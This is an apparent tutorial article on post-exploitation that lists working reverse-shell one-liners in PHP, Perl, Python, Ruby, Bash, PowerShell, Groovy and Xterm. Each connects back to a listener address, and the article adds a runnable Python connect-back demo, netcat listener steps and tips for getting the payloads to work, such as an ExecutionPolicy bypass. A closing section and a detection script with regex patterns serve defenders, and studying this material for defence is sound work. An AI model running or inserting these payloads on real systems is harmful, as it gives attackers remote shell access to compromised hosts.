Post Exploitation and Reverse Shells: Understanding the Basics


In the world of cybersecurity, offensive and defensive teams are in a continuous contest to gain control of, or protect, computer systems. One crucial part of offensive operations is post-exploitation: keeping access to a compromised system and using that access for further attacks. One of the most common post-exploitation techniques is the reverse shell.

In this article, we will explore the concept of post-exploitation and dive into various examples of reverse shells, with a focus on PHP, Perl, Python, Ruby, Bash, PowerShell, Java, and Xterm reverse shells.

Understanding Post-Exploitation

Post-exploitation refers to the phase in a cyber attack where the attacker has successfully compromised a target system and now seeks to maximize their control and access. During this phase, attackers aim to stay undetected, expand their foothold, and escalate privileges to access critical data and systems.

Post-exploitation activities vary based on the attacker’s objectives, but they typically involve reconnaissance, lateral movement, data exfiltration, and maintaining persistence to ensure continued access.

What are Reverse Shells?

A reverse shell is a shell connection initiated by the compromised host towards a listener on the attacker's system. Once connected, the attacker interacts with the victim's command shell over that connection, which amounts to a backdoor into the compromised system. Reverse shells are valuable in post-exploitation because they get around a common firewall posture: inbound connections to the target are blocked, but outbound connections (often on ports such as 80 or 443) are allowed, so the target connecting out to the attacker succeeds where the attacker connecting in would not. The attacker only needs a listener waiting on the chosen port, for example `nc -lvnp 1234`.
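The following block shows the whole exchange end to end on one machine: a listener that plays the attacker's `nc -lvnp` role and a connect-back that does exactly what the Python one-liner later in this article does, namely hand `/bin/sh` the socket as stdin, stdout and stderr. It is an added example and not code from the original article; the loopback address, the use of an OS-chosen port and the commands sent are assumptions for the demo.

```python
"""Reverse shell round trip on loopback: a listener plus a connect-back shell.
Added example, not from the original article. Assumptions: attacker and
victim are the same host (127.0.0.1), the port is chosen by the OS, and the
'operator' sends a scripted set of commands instead of typing them."""
import socket
import subprocess
import threading

LISTEN_HOST = "127.0.0.1"  # assumption: both sides on one box for the demo


def start_listener(host=LISTEN_HOST, port=0):
    """Bind a TCP listener the way `nc -lvnp <port>` would. Port 0 asks the OS
    for a free port; the chosen port is returned so the victim can connect
    back to it."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv, srv.getsockname()[1]


def connect_back(host, port):
    """Victim side. Same mechanics as the Python one-liner: connect out, then
    give /bin/sh the socket as fds 0, 1 and 2. Passing the socket to subprocess
    keeps this process's own stdio intact, which is what a demo wants; the
    one-liner uses os.dup2 to redirect the interpreter itself."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    # Non-interactive shell: stdin is not a tty, so no prompt noise on stderr.
    subprocess.run(["/bin/sh"], stdin=s, stdout=s, stderr=s)
    s.close()


def run_session(commands):
    """Drive one full exchange and return what the shell sent back as text."""
    srv, port = start_listener()
    victim = threading.Thread(target=connect_back, args=(LISTEN_HOST, port))
    victim.start()
    conn, _ = srv.accept()
    # The operator's keystrokes; 'exit' makes the remote shell hang up.
    script = "\n".join(commands) + "\nexit\n"
    conn.sendall(script.encode())
    chunks = []
    while True:
        data = conn.recv(4096)
        if not data:  # EOF: the shell exited and the victim closed the socket
            break
        chunks.append(data)
    conn.close()
    srv.close()
    victim.join()
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    print(run_session(["id", "uname -a", "echo $((6*7))"]))
```

The listener sends its script before it reads because the commands are a few bytes and fit in the socket buffer; with an interactive operator you would read and write concurrently, which is what netcat does for you.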

Now, let’s explore some examples of reverse shells in different programming languages:

1. PHP Reverse Shell

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

This assumes the socket lands on file descriptor 3, which is usually the case for a fresh `php -r` process. If the shell connects but stays silent, the descriptor is different (4, 5 and 6 are the usual alternatives); adjust the three redirections accordingly.

2. Tiny Reverse Shell (PHP)

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.9.36.167/1337 0>&1'");

3. Perl Reverse Shell

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

4. Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

5. Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

6. Bash Reverse Shell

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

7. PowerShell Reverse Shell

Create a simple PowerShell script called `reverse.ps1`:

function reverse_powershell {
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
}

Then load the script into the session and call the function. Dot-sourcing with an explicit relative path is the reliable way to do this; a bare `Import-Module reverse.ps1` is treated as a module name and searched for in `$env:PSModulePath`, not in the current directory:

powershell -ExecutionPolicy bypass -command ". .\reverse.ps1; reverse_powershell"

Unlike the Unix examples, this is not a real shell: each line the attacker sends is run through `iex` (Invoke-Expression) and the output is written back, which is why the script fakes a `PS path>` prompt.

8. Java Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Strictly speaking this is Groovy syntax (the list literal, `as String[]` and the `\$line` escape inside a double-quoted GString), as used in a Jenkins script console or other Groovy scripting hooks on the JVM. In plain Java the equivalent call is `Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", "..."})`. The bash payload itself opens fd 5 on `/dev/tcp`, reads lines from it and runs each one with its output sent back over the same descriptor.

9. Xterm Reverse Shell

xterm -display 10.0.0.1:1

This one pushes an X11 window rather than a raw shell: the target starts `xterm` and tells it to display on the attacker's X server at 10.0.0.1, display 1 (TCP port 6001). The attacker therefore needs an X server listening there first, for example `Xnest :1`, and must allow the target to connect to it with `xhost +targetip`.

Conclusion

Post-exploitation and reverse shells are essential concepts in the world of cybersecurity. The ability to maintain access and control over a compromised system allows attackers to explore the network, escalate privileges, and carry out their objectives without raising suspicion.

For defenders, knowing how these reverse shells work points directly at what to look for: every example above ends with a shell or interpreter whose standard input and output are a network socket, and most of them carry a recognisable connect-back idiom on the command line (`/dev/tcp/`, `fsockopen`, `dup2`, `TCPSocket`, `TCPClient`). Egress filtering limits which of them can connect out at all, and process and command-line telemetry catches the rest. Organisations and security professionals should monitor network activity and process behaviour for these patterns and keep refining their defences against post-exploitation techniques and other cyber threats.
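As an added example of the detection logic described above (not part of the original article), the block below checks process records for the two signals every reverse shell in this list produces: a shell whose stdin/stdout/stderr are sockets, and a connect-back idiom in the command line. The sample snapshot is constructed for the demo; `read_proc()` builds the same record from a live Linux `/proc` entry. The regexes and the shell list are this example's own choices.

```python
"""Spotting reverse shells from process state. Added example, not from the
original article. Signals checked per process record:
  1. a shell (sh/bash/dash/zsh/ksh) whose fds 0/1/2 point at a socket, which is
     the redirection every one-liner above performs;
  2. a command line carrying one of the connect-back idioms from this page.
SAMPLE is constructed telemetry, not real data."""
import os
import re

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}

# Idioms lifted from the one-liners on this page. These regexes are this
# example's own and will not catch every encoding or obfuscation.
CONNECT_BACK_PATTERNS = [
    re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),   # bash, java/groovy
    re.compile(r"fsockopen\("),                            # php
    re.compile(r"socket\.socket\(.*dup2\("),               # python
    re.compile(r"TCPSocket\.open\("),                      # ruby
    re.compile(r"socket\(S,PF_INET"),                      # perl
    re.compile(r"Net\.Sockets\.TCPClient", re.I),          # powershell
    re.compile(r"xterm\s+-display\s+\S+:\d+"),             # xterm
]


def classify(record):
    """record: dict with comm, cmdline and fds (fd number -> link target).
    Returns the list of reasons the record looks like a reverse shell; an
    empty list means nothing tripped."""
    reasons = []
    fds = record.get("fds", {})
    stdio_sockets = [n for n in (0, 1, 2) if fds.get(n, "").startswith("socket:")]
    if record.get("comm") in SHELLS and len(stdio_sockets) >= 2:
        reasons.append("shell with stdio on a socket: fds %s" % stdio_sockets)
    cmd = record.get("cmdline", "")
    for pat in CONNECT_BACK_PATTERNS:
        if pat.search(cmd):
            reasons.append("connect-back idiom in cmdline: %s" % pat.pattern)
            break
    return reasons


def read_proc(pid):
    """Build a record for a live process from Linux /proc. Assumption: the
    caller may read the target's fd links (root, or the same user)."""
    base = "/proc/%d" % pid
    with open(base + "/comm") as f:
        comm = f.read().strip()
    with open(base + "/cmdline", "rb") as f:
        cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
    fds = {}
    for n in (0, 1, 2):
        try:
            fds[n] = os.readlink("%s/fd/%d" % (base, n))
        except OSError:
            pass  # fd closed, or permission denied
    return {"pid": pid, "comm": comm, "cmdline": cmdline, "fds": fds}


# Constructed sample snapshot (not real telemetry).
SAMPLE = [
    {"pid": 4120, "comm": "bash", "cmdline": "bash -i",
     "fds": {0: "socket:[88231]", 1: "socket:[88231]", 2: "socket:[88231]"}},
    {"pid": 4133, "comm": "python3",
     "cmdline": 'python3 -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,'
                'socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0)',
     "fds": {0: "/dev/pts/3", 1: "/dev/pts/3", 2: "/dev/pts/3"}},
    {"pid": 2210, "comm": "bash", "cmdline": "-bash",          # normal login shell
     "fds": {0: "/dev/pts/1", 1: "/dev/pts/1", 2: "/dev/pts/1"}},
    {"pid": 980, "comm": "sshd", "cmdline": "sshd: alice [priv]",
     "fds": {0: "/dev/null", 1: "/dev/null", 2: "/dev/null"}},
]


def scan(records):
    """Return {pid: reasons} for every record that trips at least one signal."""
    return {rec["pid"]: classify(rec) for rec in records if classify(rec)}


if __name__ == "__main__":
    for pid, why in scan(SAMPLE).items():
        print(pid, why)
```

Signal 1 has a known benign source: inetd-style and socket-activated services hand their child a socket as stdio, so tune the shell list and whitelist those parents before alerting. Signal 2 is cheap and precise but trivially evaded by base64-encoding the payload, which is why the two are combined.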
